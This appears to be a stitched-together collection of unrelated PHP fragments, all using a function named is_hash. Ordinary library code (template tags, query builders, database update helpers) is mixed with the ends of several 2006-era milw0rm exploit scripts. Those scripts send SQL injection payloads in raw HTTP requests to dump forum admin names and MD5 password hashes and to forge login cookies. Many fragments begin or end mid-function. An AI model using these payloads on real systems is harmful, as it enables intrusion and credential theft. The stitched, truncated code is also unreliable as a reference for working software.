function output($txt) { if (is_hash($txt)) { $out = '['; foreach ($txt as $k => $v) { $out .= output($k) . " => " . output($v) . ', '; } $out .= "]"; return $out; } else { if (is_array($txt)) { $out = '['; foreach ($txt as $k) { $out .= output($k) . ', '; } $out .= "]"; return $out; } else { if ($txt === TRUE || $txt === FALSE) { return $txt === TRUE ? "true" : "false"; } else { return "'{$txt}'"; } } } }
public function alias($fields) { if (is_array($fields)) { if (is_hash($fields)) { foreach ($fields as $alias => $field) { if (!is_numeric($alias)) { $fields[$alias] = $field . ' AS ' . $alias; } } } $fields = implode(',', $fields); } return $fields; }
/** * Pulls out the options hash from $array if any. * * @internal DO NOT remove the reference on $array. * @param array &$array An array * @return array A valid options array */ public static function extract_and_validate_options(array &$array) { $options = array(); if ($array) { $last =& $array[count($array) - 1]; try { if (self::is_options_hash($last)) { array_pop($array); $options = $last; } } catch (ActiveRecordException $e) { if (!is_hash($last)) { throw $e; } $options = array('conditions' => $last); } } return $options; }
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); sleep(1); $packet = "GET " . $p . "index.php?mode=viewid&post_id={$post_id} HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); //echo $html; $temp = explode('"message"><!--', $html); for ($i = 1; $i < count($temp); $i++) { $temp2 = explode("-->", $temp[$i]); if (is_hash($temp2[0])) { $hash = $temp2[0]; $temp2 = explode("-->", $temp[$i + 1]); $admin = $temp2[0]; echo "----------------------------------------------------------------\n"; echo "admin -> " . $admin . "\n"; echo "password (md5) -> " . $hash . "\n"; echo "----------------------------------------------------------------\n"; die; } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-08-07]
$packet = "POST " . $p . "index.php HTTP/1.0\r\n"; $packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $packet .= "Accept-Encoding: text/plain\r\n"; $packet .= "User-Agent: Googlebot/2.1\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("Gadget is not enabled", $html)) { die("search gadget is not enabled... exploit failed"); } $temp = explode('">*SUNTZOI*', $html); $temp2 = explode('*SUNTZOI*', $temp[1]); $admin = $temp2[0]; $temp = explode('href="*SUNTZU*', $html); $temp2 = explode('*SUNTZU*', $temp[1]); $hash = $temp2[0]; if ($admin != '' and $hash != '' and is_hash($hash)) { echo "Exploit succeeded...\r\n"; echo "--------------------------------------------------------------------\r\n"; echo "admin -> " . $admin . "\r\n"; echo "password (md5) -> " . $hash . "\r\n"; echo "--------------------------------------------------------------------\r\n"; } else { echo "Exploit failed, maybe wrong table prefix..."; } ?> # milw0rm.com [2006-06-23]
function smarty_function_mtsetvar($args, &$ctx) { // status: complete // parameters: name, value $name = $args['name']; $name or $name = $args['var']; if (!$name) { return ''; } $value = $args['value']; $vars =& $ctx->__stash['vars']; if (strtolower($name) == 'page_layout') { # replaces page layout for current page require_once "MTUtil.php"; $columns = get_page_column($value); $vars['page_columns'] = $columns; $vars['page_layout'] = $value; } if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) { $func = $matches[1]; $name = $matches[2]; } else { if (array_key_exists('function', $args)) { $func = $args['function']; } } # pick off any {...} or [...] from the name. if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) { $name = $matches[1]; $br = $matches[2]; $ref = $matches[3]; if (preg_match('/^\\$(.+)/', $ref, $ref_matches)) { $ref = $vars[$ref_matches[1]]; if (!isset($ref)) { $ref = chr(0); } } $br == '[' ? $index = $ref : ($key = $ref); } else { if (array_key_exists('index', $args)) { $index = $args['index']; } else { if (array_key_exists('key', $args)) { $key = $args['key']; } } } if (preg_match('/^\\$/', $name)) { $name = $vars[$name]; if (!isset($name)) { return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>")); } } $existing = $vars[$name]; require_once "MTUtil.php"; if (isset($key)) { if (!isset($existing)) { $existing = array($key => $value); } elseif (is_hash($existing)) { $existing = $existing[$key]; } else { return $ctx->error($ctx->mt->translate("'[_1]' is not a hash.", $name)); } } elseif (isset($index)) { if (!isset($existing)) { $existing[$index] = $value; } elseif (is_array($existing)) { if (is_numeric($index)) { $existing = $existing[$index]; } else { return $ctx->error($ctx->mt->translate("Invalid index.")); } } else { return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name)); } } if (array_key_exists('append', $args) && $args['append']) { $value = isset($existing) ? $existing . $value : $value; } elseif (array_key_exists('prepend', $args) && $args['prepend']) { $value = isset($existing) ? $value . $existing : $value; } elseif (isset($existing) && array_key_exists('op', $args)) { $op = $args['op']; $value = _math_operation($op, $existing, $value); if (!isset($value)) { return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $existing, $op, $value)); } } $data = $vars[$name]; if (isset($key)) { if (isset($func) && 'delete' == strtolower($func)) { unset($data[$key]); } else { $data[$key] = $value; } } elseif (isset($index)) { $data[$index] = $value; } elseif (isset($func)) { if ('undef' == strtolower($func)) { unset($data); } else { if (isset($data) && !is_array($data)) { return $ctx->error($ctx->mt->translate("'[_1]' is not an array.", $name)); } if (!isset($data)) { $data = array(); } if ('push' == strtolower($func)) { array_push($data, $value); } elseif ('unshift' == strtolower($func)) { array_unshift($data, $value); } else { return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function.", $func)); } } } else { $data = $value; } $hash = $ctx->stash('__inside_set_hashvar'); if (isset($hash)) { $hash[$name] = $data; $ctx->stash('__inside_set_hashvar', $hash); } else { if (is_array($vars)) { $vars[$name] = $data; } else { $vars = array($name => $data); $ctx->__stash['vars'] =& $vars; } } return ''; }
function smarty_block_mtif($args, $content, &$ctx, &$repeat) { if (!isset($content)) { $result = 0; $name = isset($args['name']) ? $args['name'] : $args['var']; if (isset($name)) { unset($ctx->__stash['__cond_tag__']); # pick off any {...} or [...] from the name. if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) { $name = $matches[1]; $br = $matches[2]; $ref = $matches[3]; if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) { $ref = $vars[$ref_matches[1]]; if (!isset($ref)) { $ref = chr(0); } } $br == '[' ? $index = $ref : ($key = $ref); } else { if (array_key_exists('index', $args)) { $index = $args['index']; } else { if (array_key_exists('key', $args)) { $key = $args['key']; } } } if (preg_match('/^$/', $name)) { $name = $vars[$name]; if (!isset($name)) { return $ctx->error($ctx->mt->translate("You used an [_1] tag without a valid name attribute.", "<MT{$tag}>")); } } if (isset($name)) { $value = $ctx->__stash['vars'][$name]; require_once "MTUtil.php"; if (is_hash($value)) { if (isset($key)) { if ($key != chr(0)) { $val = $value[$key]; } else { unset($value); } } else { $val = $value; } } elseif (is_array($value)) { if (isset($index)) { if (is_numeric($index)) { $val = $value[$index]; } else { unset($value); # fall through to any 'default' } } else { $val = $value; } } else { $val = $value; } } } elseif (isset($args['tag'])) { $tag = $args['tag']; $tag = preg_replace('/^mt:?/i', '', $tag); $largs = $args; // local arguments without 'tag' element unset($largs['tag']); try { $val = $ctx->tag($tag, $largs); } catch (exception $e) { $val = ''; } } if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) { if (function_exists($val)) { ob_start(); $val($ctx, array()); $val = ob_get_contents(); ob_end_clean(); } else { $val = ''; } } if (isset($args['tag'])) { $ctx->__stash['__cond_tag__'] = $args['tag']; } else { if (isset($args['name'])) { $var_key = $args['name']; } else { if (isset($args['var'])) { $var_key = $args['var']; } } $ctx->__stash['__cond_name__'] = $var_key; } $ctx->__stash['__cond_value__'] = $val; if (array_key_exists('op', $args)) { $op = $args['op']; $rvalue = $args['value']; if ($op && isset($value) && !is_array($value)) { $val = _math_operation($op, $val, $rvalue); if (!isset($val)) { return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", array($value, $op, $rvalue))); } } } if (array_key_exists('eq', $args)) { $val2 = $args['eq']; $result = $val == $val2 ? 1 : 0; } elseif (array_key_exists('ne', $args)) { $val2 = $args['ne']; $result = $val != $val2 ? 1 : 0; } elseif (array_key_exists('gt', $args)) { $val2 = $args['gt']; $result = $val > $val2 ? 1 : 0; } elseif (array_key_exists('lt', $args)) { $val2 = $args['lt']; $result = $val < $val2 ? 1 : 0; } elseif (array_key_exists('ge', $args)) { $val2 = $args['ge']; $result = $val >= $val2 ? 1 : 0; } elseif (array_key_exists('le', $args)) { $val2 = $args['le']; $result = $val <= $val2 ? 1 : 0; } elseif (array_key_exists('like', $args)) { $patt = $args['like']; $opt = ""; if (preg_match("/^\\/.+\\/([si]+)?\$/", $patt, $matches)) { $patt = preg_replace("/^\\/|\\/([si]+)?\$/", "", $patt); if ($matches[1]) { $opt = $matches[1]; } } else { $patt = preg_replace("!/!", "\\/", $patt); } $result = preg_match("/{$patt}/{$opt}", $val) ? 1 : 0; } elseif (array_key_exists('test', $args)) { $expr = 'return (' . $args['test'] . ') ? 1 : 0;'; // export vars into local variable namespace, then eval expr extract($ctx->__stash['vars']); $result = eval($expr); if ($result === FALSE) { die("error in expression [" . $args['test'] . "]"); } } else { $result = isset($val) && $val ? 1 : 0; } return $ctx->_hdlr_if($args, $content, $ctx, $repeat, $result); } else { $vars =& $ctx->__stash['vars']; return $ctx->_hdlr_if($args, $content, $ctx, $repeat); } }
private function apply_where_conditions($args) { require_once 'Expressions.php'; $num_args = count($args); if ($num_args == 1 && is_hash($args[0])) { $hash = is_null($this->joins) ? $args[0] : $this->prepend_table_name_to_fields($args[0]); $e = new Expressions($this->connection, $hash); $this->where = $e->to_s(); $this->where_values = array_flatten($e->values()); } elseif ($num_args > 0) { // if the values has a nested array then we'll need to use Expressions to expand the bind marker for us $values = array_slice($args, 1); foreach ($values as $name => &$value) { if (is_array($value)) { $e = new Expressions($this->connection, $args[0]); $e->bind_values($values); $this->where = $e->to_s(); $this->where_values = array_flatten($e->values()); return; } } // no nested array so nothing special to do $this->where = $args[0]; $this->where_values =& $values; } }
$packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Cookie: threadvisit={$sql};\r\n"; $packet .= "Connection: Close\r\n\r\n"; $packet .= $data; sendpacketii($packet); $temp = explode("#post", $html); $temp2 = explode("\n", $temp[1]); echo chr((int) $temp2[0]); $user .= chr((int) $temp2[0]); } echo "\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($hash)) { print_r(' exploit succeeded, try this cookie: wbb_userid=' . $uid . '; wbb_userpassword='******'; '); } else { echo "exploit failed...\n"; } ?> # milw0rm.com [2006-11-24]
$temp2 = explode('"', $temp[1]); $HASH = $temp2[0]; if (is_hash($HASH)) { echo "HASH ->" . htmlentities($HASH) . "<BR>"; die("Exploit Succeeded..."); } else { echo "Step 1 failed... trying step 2...<br>"; } #STEP 2 -> if STEP 1 failed, vulnerability in getfile.php... this works with magic_quotes off $SQL = "'UNION SELECT value,value FROM " . $prefix . "variables1 WHERE name='admin_password'/*"; $SQL = urlencode($SQL); $packet = "GET " . $p . "getfile.php?cat=" . $SQL . " HTTP/1.1\r\n"; $packet .= "User-Agent: Python-urllib/2.0a1, maybe ;)\r\n"; $packet .= "Accept: text/plain\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; show($packet); sendpacketii($packet); $temp = explode('Content-Type: ', $html); $temp2 = explode(chr(0xd), $temp[1]); $HASH = $temp2[0]; if (is_hash($HASH)) { echo "HASH ->" . htmlentities($HASH) . "<BR>Exploit Succeeded..."; } else { echo "Exploit failed..."; } } ?> # milw0rm.com [2005-12-24]
echo "admin -> " . $my_admin . "[???]\n"; sleep(1); break; } if ($i == 255) { die("Exploit failed..."); } } $j++; } echo "--------------------------------------------------------------------\n"; echo "admin -> " . $my_admin . "\n"; echo "password (md5) -> " . $my_password . "\n"; echo "--------------------------------------------------------------------\n"; function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($my_password)) { echo "Exploit succeeded..."; } else { echo "Exploit failed..."; } ?> # milw0rm.com [2006-09-21]
$searchresult[] = $row['topic_id']; } if (count($searchresult) > 0) { $data = array('ids' => $searchresult, 'ignored' => $ignored, 'used' => $used, 'search' => $gpc->get('search', str), 'name' => $gpc->get('name', str), 'boards' => $gpc->get('boards', arr_int), 'opt_0' => $gpc->get('opt_0', int), 'opt_1' => $gpc->get('opt_1', int), 'opt_2' => $gpc->get('opt_2', int), 'temp' => $gpc->get('temp', int), 'temp2' => $gpc->get('temp2', int), 'sort' => $gpc->get('sort', str), 'order' => $gpc->get('order', str)); $fid = md5(microtime()); file_put_contents('cache/search/' . $fid . '.inc.php', serialize($data)); $slog->updatelogged(); $db->close(); viscacha_header('Location: search.php?action=result&fid=' . $fid . SID2URL_JS_x); exit; } else { error($lang->phrase('search_nothingfound'), 'search.php' . SID2URL_1); } } elseif ($_GET['action'] == "result") { $fid = $gpc->get('fid'); if (!is_hash($fid)) { error($lang->phrase('query_string_error'), 'search.php' . SID2URL_1); } $file = "cache/search/{$fid}.inc.php"; if (!file_exists($file)) { error($lang->phrase('search_doesntexist'), 'search.php' . SID2URL_1); } $data = file_get_contents($file); $data = unserialize($data); $ignored = array(); foreach ($data['ignored'] as $row) { $row = trim($row); if (!empty($row)) { $ignored[] = $row; } }
function writeValueWithSpec() { $args = func_get_args(); $val = $args[0]; if (count($args) >= 2) { $spec = $args[1]; } else { $spec = $this->spec; } if (is_array($spec)) { if (is_hash($spec)) { $keys = array_keys($spec); sort($keys); if (is_object($val)) { foreach ($keys as $k) { $this->writeValueWithSpec($val->{$k}, $spec[$k]); } } else { foreach ($keys as $k) { $this->writeValueWithSpec($val[$k], $spec[$k]); } } } else { $this->writeValue(count($val), type_check(count($val))); foreach ($val as $v) { $this->writeValueWithSpec($v, $spec[0]); } } } else { if ($spec === (TRUEVAL & FALSEVAL)) { $this->writeValue($val, type_check($val), TRUE); } else { $this->writeValue($val, $spec, TRUE); } } }
echo "table prefix -> " . $prefix . "\n"; } else { die("Unable to disclose table prefix...\n"); } } $diff = array(",0,0,0,0,0", ",0,0,0,0", ",0,0,0", ",0,0", ",0", ""); for ($j = 0; $j <= count($diff) - 1; $j++) { $sql = "9999')/**/UNION/**/SELECT/**/1,0,0,0,CONCAT('*WhOp*',username,':',password,'*WhOp*'),0,0,0,0,0" . $diff[$j] . "/**/FROM " . $prefix . "_papoo_user/**/WHERE/**/gruppenid='g1,'/*"; $sql = urlencode($sql); $packet = "GET " . $p . "forumthread.php?msgid=" . $sql . " HTTP/1.0\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Connection: Close\r\n\r\n"; sendpacketii($packet); $temp = explode("*WhOp*", $html); for ($i = 1; $i <= count($temp) - 1; $i++) { $temp2 = explode(":", $temp[$i]); if (is_hash($temp2[1])) { echo "--------------------------------------------------------\n"; echo "admin -> " . $temp2[0] . " \n"; echo "password (md5) -> " . $temp2[1] . " \n"; echo "--------------------------------------------------------\n"; die; } } } //if you are here... echo "exploit failed..."; ?> # milw0rm.com [2006-07-07]
function select_options($options = array(), $key = "", $value = "", $default_value = "") { $elem = array(); $i = is_hash($options); while (list($key, $val) = each($options)) { $key = $i ? $key : $val; if ($default_value == $key) { $elem[] = '<option value="' . $key . '" SELECTED>' . htmlspecialchars($val, ENT_QUOTES, 'UTF-8') . '</option>'; } else { $elem[] = '<option value="' . $key . '">' . htmlspecialchars($val, ENT_QUOTES, 'UTF-8') . '</option>'; } } return implode("\n", $elem); }
function save_error_data($fc, $fid = '') { global $gpc; if (!is_hash($fid)) { $fid = md5(microtime()); } $cache = new CacheItem($fid, 'temp/errordata/'); $cache->set($fc); $cache->export(); return $fid; }
function smarty_block_mtloop($args, $content, &$ctx, &$repeat) { $localvars = array(array('__loop_keys', '__loop_values', '__out'), common_loop_vars()); if (!isset($content)) { $ctx->localize($localvars); $vars =& $ctx->__stash['vars']; $value = ''; $name = $args['name']; $name or $name = $args['var']; if (!$name) { return ''; } if (isset($vars[$name])) { $value = $vars[$name]; } if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) { if (function_exists($value)) { ob_start(); $value($ctx, array()); $value = ob_get_contents(); ob_end_clean(); } else { $value = ''; } } if (!is_array($value) || 0 == count($value)) { $repeat = false; return ''; } $sort = $args['sort_by']; $keys = array_keys($value); if ($sort) { $sort = strtolower($sort); if (preg_match('/\\bkey\\b/', $sort)) { usort($keys, create_function('$a,$b', 'return strcmp($a, $b);')); } elseif (preg_match('/\\bvalue\\b/', $sort)) { $sort_fn = ''; foreach (array_keys($value) as $key) { $v = $value[$key]; $sort_fn .= "\$value['{$key}']='{$v}';"; } if (preg_match('/\\bnumeric\\b/', $sort)) { $sort_fn .= 'return $value[$a] === $value[$b] ? 0 : ($value[$a] > $value[$b] ? 1 : -1);'; $sorter = create_function('$a,$b', $sort_fn); } else { $sort_fn .= 'return strcmp($value[$a], $value[$b]);'; $sorter = create_function('$a,$b', $sort_fn); } usort($keys, $sorter); } if (preg_match('/\\breverse\\b/', $sort)) { $keys = array_reverse($keys); } } $counter = 1; $ctx->stash('__loop_values', $value); $ctx->stash('__out', false); } else { $counter = $ctx->__stash['vars']['__counter__'] + 1; $keys = $ctx->stash('__loop_keys'); $value = $ctx->stash('__loop_values'); $out = $ctx->stash('__out'); if (!isset($keys) || $keys == 0) { $ctx->restore($localvars); $repeat = false; if (isset($args['glue']) && $out && !empty($content)) { $content = $args['glue'] . $content; } return $content; } } $key = array_shift($keys); $this_value = $value[$key]; $ctx->stash('__loop_keys', $keys); $ctx->__stash['vars']['__counter__'] = $counter; $ctx->__stash['vars']['__odd__'] = $counter % 2 == 1; $ctx->__stash['vars']['__even__'] = $counter % 2 == 0; $ctx->__stash['vars']['__first__'] = $counter == 1; $ctx->__stash['vars']['__last__'] = count($keys) == 0; $ctx->__stash['vars']['__key__'] = $key; $ctx->__stash['vars']['__value__'] = $this_value; if (is_array($this_value) && 0 < count($this_value)) { require_once "MTUtil.php"; if (is_hash($this_value)) { foreach (array_keys($this_value) as $inner_key) { $ctx->__stash['vars'][strtolower($inner_key)] = $this_value[$inner_key]; } } } if (isset($args['glue']) && !empty($content)) { if ($out) { $content = $args['glue'] . $content; } else { $ctx->stash('__out', true); } } if (0 === count($keys)) { $ctx->stash('__loop_keys', 0); } $repeat = true; return $content; }
} else { ($code = $plugins->load('editprofile_about2_query')) ? eval($code) : null; $db->query("UPDATE {$db->pre}user SET about = '{$_POST['about']}' WHERE id = '{$my->id}'"); ok($lang->phrase('data_success'), "editprofile.php?action=about" . SID2URL_x); } } elseif ($_GET['action'] == "about") { if ($my->p['useabout'] == 0) { errorLogin($lang->phrase('not_allowed'), "editprofile.php"); } $breadcrumb->Add($lang->phrase('editprofile_about')); echo $tpl->parse("header"); echo $tpl->parse("menu"); ($code = $plugins->load('editprofile_abos_Start')) ? eval($code) : null; BBProfile($bbcode); $fid = $gpc->get('fid', str); if (is_hash($fid)) { $data = $gpc->unescape(import_error_data($fid)); if ($_GET['job'] == 'preview') { $preview = true; $data = $gpc->unescape($data); $parsedPreview = $bbcode->parse($data); } else { $preview = false; } } else { $data = $my->about; $preview = false; } $chars = numbers($config['maxaboutlength']); ($code = $plugins->load('editprofile_abos_prepared')) ? eval($code) : null; echo $tpl->parse("editprofile/about");
/** * Update a record in a table * * $dataobject is an object containing needed data * Relies on $dataobject having a variable "id" to * specify the record to update * * @uses $db * @param string $table The database table to be checked against. * @param array $dataobject An object with contents equal to fieldname=>fieldvalue. Must have an entry for 'id' to map to the table specified. * @param mixed $where defines the WHERE part of the upgrade. Can be string (key) or array (keys) or hash (keys/values). * If the first two, values are expected to be in $dataobject. * @return bool * @throws SQLException */ function update_record($table, $dataobject, $where = null) { global $db; if (is_object($dataobject)) { $dataobject = clone $dataobject; } if (empty($where)) { $where = 'id'; if (!isset($dataobject->id)) { // nothing to put in the where clause and we don't want to update everything throw new SQLException('update_record called with no where clause and no ID'); } } $wherefields = array(); $wherevalues = array(); $values = array(); if (is_string($where)) { // treat it like a stack (ie, field in dataobject) $where = array($where); } if (is_object($where) || is_hash($where)) { // the values are contained in the where ... foreach ((array) $where as $field => $value) { $wherefields[] = $field; $wherevalues[] = $value; unset($dataobject->{$field}); } } else { if (is_array($where)) { // look for the values in $dataobject and complain bitterly if they're not there foreach ($where as $field) { if (!isset($dataobject->{$field})) { throw new SQLException('Field in where clause not in the update object'); } $wherefields[] = $field; $wherevalues[] = $dataobject->{$field}; unset($dataobject->{$field}); } } else { throw new SQLException('the $where object is in a very odd form'); } } static $table_columns; // Determine all the fields in the table if (is_array($table_columns) && isset($table_columns[$table])) { $columns = $table_columns[$table]; } else { if (!($columns = $db->MetaColumns(get_config('dbprefix') . $table))) { throw new SQLException('Could not get columns for table ' . $table); } $table_columns[$table] = $columns; } $data = (array) $dataobject; // Pull out data matching these fields $ddd = array(); foreach ($columns as $column) { if (!in_array($column->name, $wherefields) && array_key_exists($column->name, $data)) { $ddd[$column->name] = $data[$column->name]; // PostgreSQL bytea support if (is_postgres() && $column->type == 'bytea') { $ddd[$column->name] = $db->BlobEncode($ddd[$column->name]); } } } // Construct SQL queries $numddd = count($ddd); $count = 0; $update = ''; foreach ($ddd as $key => $value) { $count++; $update .= db_quote_identifier($key) . ' = ? '; if ($count < $numddd) { $update .= ', '; } $values[] = $value; } $whereclause = ''; $count = 0; $numddd = count($wherefields); foreach ($wherefields as $field) { $count++; $whereclause .= db_quote_identifier($field) . ' = ? '; if ($count < $numddd) { $whereclause .= ' AND '; } } $sql = 'UPDATE ' . db_table_name($table) . ' SET ' . $update . ' WHERE ' . $whereclause; try { $stmt = $db->Prepare($sql); increment_perf_db_writes(); $rs = $db->Execute($stmt, array_merge($values, $wherevalues)); return true; } catch (ADODB_Exception $e) { throw new SQLException(create_sql_exception_message($e, $sql, array_merge($values, $wherevalues))); } }
public function options_to_sql($options) { $table = array_key_exists('from', $options) ? $options['from'] : $this->get_fully_qualified_table_name(); $sql = new SQLBuilder($this->conn, $table); if (array_key_exists('joins', $options)) { $sql->joins($this->create_joins($options['joins'])); // by default, an inner join will not fetch the fields from the joined table if (!array_key_exists('select', $options)) { $options['select'] = $this->get_fully_qualified_table_name() . '.*'; } } if (array_key_exists('select', $options)) { $sql->select($options['select']); } if (array_key_exists('conditions', $options)) { if (!is_hash($options['conditions'])) { if (is_string($options['conditions'])) { $options['conditions'] = array($options['conditions']); } call_user_func_array(array($sql, 'where'), $options['conditions']); } else { if (!empty($options['mapped_names'])) { $options['conditions'] = $this->map_names($options['conditions'], $options['mapped_names']); } $sql->where($options['conditions']); } } if (array_key_exists('order', $options)) { $sql->order($options['order']); } if (array_key_exists('limit', $options)) { $sql->limit($options['limit']); } if (array_key_exists('offset', $options)) { $sql->offset($options['offset']); } if (array_key_exists('group', $options)) { $sql->group($options['group']); } if (array_key_exists('having', $options)) { $sql->having($options['having']); } return $sql; }
$data = "-----------------------------7d61bcd1f033e\r\n"; $data .= "Content-Disposition: form-data; name=\"board[styleid]\";\r\n\r\n"; $data .= "{$SQL}\r\n"; $data .= "-----------------------------7d61bcd1f033e--\r\n"; $packet = "POST " . $p . "index.php HTTP/1.0\r\n"; $packet .= "SUNTZU: " . $argu . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d61bcd1f033e\r\n"; $packet .= "Host: " . $host . "\r\n"; $packet .= "Content-Length: " . strlen($data) . "\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $data; sendpacketii($packet); if (eregi("<pre><b>ThWboard Error</b><br>", $html)) { echo $html; die("\n\nquery error... see html"); } $temp = explode("templates/", $html); $temp2 = explode("/", $temp[1]); $pwd_hash = $temp2[0]; if (is_hash($pwd_hash)) { die("pwd hash (md5) -> " . $pwd_hash . "\n"); } if (eregi("templates//frame.html", $html)) { echo "no user with given name...\n"; } echo "exploit failed...\n\n" . $html; } ?> # milw0rm.com [2007-01-14]
function array_join_merge($arr1, $arr2) { // written by dev-null@christophe.vg // taken from http://www.php.net/manual/en/function.array-merge-recursive.php if (is_array($arr1) && is_array($arr2)) { // the same -> merge $new_array = array(); if (is_hash($arr1) && is_hash($arr2)) { // hashes -> merge based on keys $keys = array_merge(array_keys($arr1), array_keys($arr2)); foreach ($keys as $key) { $new_array[$key] = array_join_merge(@$arr1[$key], @$arr2[$key]); } } else { // two real arrays -> merge $new_array = array_reverse(array_unique(array_reverse(array_merge($arr1, $arr2)))); } return $new_array; } else { // not the same ... take new one if defined, else the old one stays return $arr2 ? $arr2 : $arr1; } }
} if ($i == 255) { die("\nExploit failed..."); } } $j++; } function is_hash($hash) { if (ereg("^[a-f0-9]{32}", trim($hash))) { return true; } else { return false; } } if (is_hash($password)) { print_r(' -------------------------------------------------------------------------- cookie -> wbb_userid=' . $uid . '; wbb_userpassword='******'; -------------------------------------------------------------------------- '); if ($uid == 1) { echo "done, but... to have access to admin panel you need to break the hash\n"; } } else { echo "exploit failed..."; } ?> # milw0rm.com [2006-11-23]
function smarty_function_mtvar($args, &$ctx) { // status: complete // parameters: name if (array_key_exists('value', $args) && !array_key_exists('op', $args)) { require_once "function.mtsetvar.php"; return smarty_function_mtsetvar($args, $ctx); } require_once "MTUtil.php"; $vars =& $ctx->__stash['vars']; $value = ''; $name = $args['name']; $name or $name = $args['var']; if (preg_match('/^(config|request)\\.(.+)$/i', $name, $m)) { if (strtolower($m[1]) == 'config') { if (!preg_match('/password/i', $m[2])) { global $mt; return $mt->config[strtolower($m[2])]; } } elseif (strtolower($m[1]) == 'request') { return $_REQUEST[$m[2]]; } } if (!$name) { return ''; } if (preg_match('/^(\\w+)\\((.+)\\)$/', $name, $matches)) { $func = $matches[1]; $name = $matches[2]; } else { if (array_key_exists('function', $args)) { $func = $args['function']; } } # pick off any {...} or [...] from the name. if (preg_match('/^(.+)([\\[\\{])(.+)[\\]\\}]$/', $name, $matches)) { $name = $matches[1]; $br = $matches[2]; $ref = $matches[3]; if (preg_match('/^\\\\\\$(.+)/', $ref, $ref_matches)) { $ref = $vars[$ref_matches[1]]; if (!isset($ref)) { $ref = chr(0); } } $br == '[' ? $index = $ref : ($key = $ref); } else { if (array_key_exists('index', $args)) { $index = $args['index']; } else { if (array_key_exists('key', $args)) { $key = $args['key']; } } } if (preg_match('/^\\$/', $name)) { $name = $vars[$name]; if (!isset($name)) { return $ctx->error($ctx->mt->translate("You used a [_1] tag without a valid name attribute.", "<MT{$tag}>")); } } if (isset($vars[$name])) { $value = $vars[$name]; } if (!is_array($value) && preg_match('/^smarty_fun_[a-f0-9]+$/', $value)) { if (function_exists($value)) { ob_start(); $value($ctx, array()); $value = ob_get_contents(); ob_end_clean(); } else { $value = ''; } } $return_val = $value; if (isset($name)) { if (is_hash($value)) { if (isset($key)) { if (isset($func)) { if ('delete' == strtolower($func)) { $return_val = $value[$key]; unset($value[$key]); $vars[$name] = $value; } else { return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func)); } } else { if ($key != chr(0)) { $return_val = $value[$key]; } else { unset($value); } } } elseif (isset($func)) { if ('count' == strtolower($func)) { $return_val = count(array_keys($value)); } else { return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for a hash.", $func)); } } else { if (array_key_exists('to_json', $args) && $args['to_json']) { if (function_exists('json_encode')) { $return_val = json_encode($value); } else { $return_val = ''; } } } } elseif (is_array($value)) { if (isset($index)) { if (is_numeric($index)) { $return_val = $value[$index]; } else { unset($value); # fall through to any 'default' } } elseif (isset($func)) { $func = strtolower($func); if ('pop' == $func) { $return_val = array_pop($value); $vars[$name] = $value; } elseif ('shift' == $func) { $return_val = array_shift($value); $vars[$name] = $value; } elseif ('count' == $func) { $return_val = count($value); } else { return $ctx->error($ctx->mt->translate("'[_1]' is not a valid function for an array.", $func)); } } else { if (array_key_exists('to_json', $args) && $args['to_json']) { if (function_exists('json_encode')) { $return_val = json_encode($value); } else { $return_val = ''; } } } } if (array_key_exists('op', $args)) { $op = $args['op']; $rvalue = $args['value']; if ($op && isset($value) && !is_array($value)) { $return_val = _math_operation($op, $value, $rvalue); if (!isset($return_val)) { return $ctx->error($ctx->mt->translate("[_1] [_2] [_3] is illegal.", $value, $op, $rvalue)); } } } } if ($return_val == '') { if (isset($args['default'])) { $return_val = $args['default']; } } if (isset($args['escape'])) { $esc = strtolower($args['escape']); if ($esc == 'js') { $return_val = encode_js($return_val); } elseif ($esc == 'html') { if (version_compare(phpversion(), '4.3.0', '>=')) { global $mt; $charset = $mt->config('PublishCharset'); $return_val = htmlentities($return_val, ENT_COMPAT, $charset); } else { $return_val = htmlentities($return_val, ENT_COMPAT); } } elseif ($esc == 'url') { $return_val = urlencode($return_val); $return_val = preg_replace('/\\+/', '%20', $return_val); } } return $return_val; }
private function apply_where_conditions($args) { $num_args = count($args); if ($num_args == 1 && is_hash($args[0])) { $e = new Expressions($args[0]); $e->set_connection($this->connection); $this->where = $e->to_s(); $this->where_values = array_flatten($e->values()); } elseif ($num_args > 0) { // if the values has a nested array then we'll need to use Expressions to expand the bind marker for us $values = array_slice($args, 1); foreach ($values as $name => &$value) { if (is_array($value)) { $e = new Expressions($args[0]); $e->set_connection($this->connection); $e->bind_values($values); $this->where = $e->to_s(); $this->where_values = array_flatten($e->values()); return; } } // no nested array so nothing special to do $this->where = $args[0]; $this->where_values =& $values; } }